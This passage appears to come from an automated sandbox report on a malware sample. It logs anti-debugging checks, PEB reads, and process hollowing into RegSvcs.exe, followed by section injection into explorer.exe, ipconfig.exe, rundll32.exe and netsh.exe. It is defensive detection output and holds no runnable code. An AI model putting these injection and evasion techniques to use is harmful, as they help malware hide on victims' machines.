              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016709AD mov eax, dword ptr fs:[00000030h]15_2_016709AD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016709AD mov eax, dword ptr fs:[00000030h]15_2_016709AD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov esi, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov eax, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov eax, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706870 mov eax, dword ptr fs:[00000030h]15_2_01706870
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706870 mov eax, dword ptr fs:[00000030h]15_2_01706870
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE872 mov eax, dword ptr fs:[00000030h]15_2_016FE872
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE872 mov eax, dword ptr fs:[00000030h]15_2_016FE872
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01682840 mov ecx, dword ptr fs:[00000030h]15_2_01682840
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674859 mov eax, dword ptr fs:[00000030h]15_2_01674859
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674859 mov eax, dword ptr fs:[00000030h]15_2_01674859
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0854 mov eax, dword ptr fs:[00000030h]15_2_016A0854
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171483A mov eax, dword ptr fs:[00000030h]15_2_0171483A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171483A mov eax, dword ptr fs:[00000030h]15_2_0171483A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA830 mov eax, dword ptr fs:[00000030h]15_2_016AA830
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov ecx, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC810 mov eax, dword ptr fs:[00000030h]15_2_016FC810
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC8F9 mov eax, dword ptr fs:[00000030h]15_2_016AC8F9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC8F9 mov eax, dword ptr fs:[00000030h]15_2_016AC8F9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A8E4 mov eax, dword ptr fs:[00000030h]15_2_0173A8E4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E8C0 mov eax, dword ptr fs:[00000030h]15_2_0169E8C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670887 mov eax, dword ptr fs:[00000030h]15_2_01670887
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC89D mov eax, dword ptr fs:[00000030h]15_2_016FC89D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166CB7E mov eax, dword ptr fs:[00000030h]15_2_0166CB7E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EB50 mov eax, dword ptr fs:[00000030h]15_2_0171EB50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706B40 mov eax, dword ptr fs:[00000030h]15_2_01706B40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706B40 mov eax, dword ptr fs:[00000030h]15_2_01706B40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173AB40 mov eax, dword ptr fs:[00000030h]15_2_0173AB40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01718B42 mov eax, dword ptr fs:[00000030h]15_2_01718B42
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EB20 mov eax, dword ptr fs:[00000030h]15_2_0169EB20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EB20 mov eax, dword ptr fs:[00000030h]15_2_0169EB20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01738B28 mov eax, dword ptr fs:[00000030h]15_2_01738B28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01738B28 mov eax, dword ptr fs:[00000030h]15_2_01738B28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EBFC mov eax, dword ptr fs:[00000030h]15_2_0169EBFC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FCBF0 mov eax, dword ptr fs:[00000030h]15_2_016FCBF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EBD0 mov eax, dword ptr fs:[00000030h]15_2_0171EBD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680BBE mov eax, dword ptr fs:[00000030h]15_2_01680BBE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680BBE mov eax, dword ptr fs:[00000030h]15_2_01680BBE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EA60 mov eax, dword ptr fs:[00000030h]15_2_0171EA60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ECA72 mov eax, dword ptr fs:[00000030h]15_2_016ECA72
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ECA72 mov eax, dword ptr fs:[00000030h]15_2_016ECA72
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680A5B mov eax, dword ptr fs:[00000030h]15_2_01680A5B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680A5B mov eax, dword ptr fs:[00000030h]15_2_01680A5B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EA2E mov eax, dword ptr fs:[00000030h]15_2_0169EA2E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA24 mov eax, dword ptr fs:[00000030h]15_2_016ACA24
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA38 mov eax, dword ptr fs:[00000030h]15_2_016ACA38
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01694A35 mov eax, dword ptr fs:[00000030h]15_2_01694A35
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01694A35 mov eax, dword ptr fs:[00000030h]15_2_01694A35
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FCA11 mov eax, dword ptr fs:[00000030h]15_2_016FCA11
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AAAEE mov eax, dword ptr fs:[00000030h]15_2_016AAAEE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AAAEE mov eax, dword ptr fs:[00000030h]15_2_016AAAEE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670AD0 mov eax, dword ptr fs:[00000030h]15_2_01670AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4AD0 mov eax, dword ptr fs:[00000030h]15_2_016A4AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4AD0 mov eax, dword ptr fs:[00000030h]15_2_016A4AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678AA0 mov eax, dword ptr fs:[00000030h]15_2_01678AA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678AA0 mov eax, dword ptr fs:[00000030h]15_2_01678AA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6AA4 mov eax, dword ptr fs:[00000030h]15_2_016C6AA4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744A80 mov eax, dword ptr fs:[00000030h]15_2_01744A80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8A90 mov edx, dword ptr fs:[00000030h]15_2_016A8A90
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01708D6B mov eax, dword ptr fs:[00000030h]15_2_01708D6B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F8D20 mov eax, dword ptr fs:[00000030h]15_2_016F8D20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01728D10 mov eax, dword ptr fs:[00000030h]15_2_01728D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01728D10 mov eax, dword ptr fs:[00000030h]15_2_01728D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4D1D mov eax, dword ptr fs:[00000030h]15_2_016A4D1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01710DF0 mov eax, dword ptr fs:[00000030h]15_2_01710DF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01710DF0 mov eax, dword ptr fs:[00000030h]15_2_01710DF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690DE1 mov eax, dword ptr fs:[00000030h]15_2_01690DE1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166CDEA mov eax, dword ptr fs:[00000030h]15_2_0166CDEA
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A52CE0 GetProcessHeap,0_2_00A52CE0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A46878
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4AAC4
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46A0B SetUnhandledExceptionFilter,0_2_00A46A0B
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A45BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A45BBF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_005629B2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00550BCF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550D65 SetUnhandledExceptionFilter,8_2_00550D65
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00550FB1

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x1AFA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x16EA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x172A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x1AFA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x17FA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x145A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x172A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x145A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x18AA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x18AA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x1C5A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x14BA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x1C5A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x14BA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x14EA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtClose: Indirect: 0x14EA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x17FA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe NtQueueApcThread: Indirect: 0x16EA4F2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
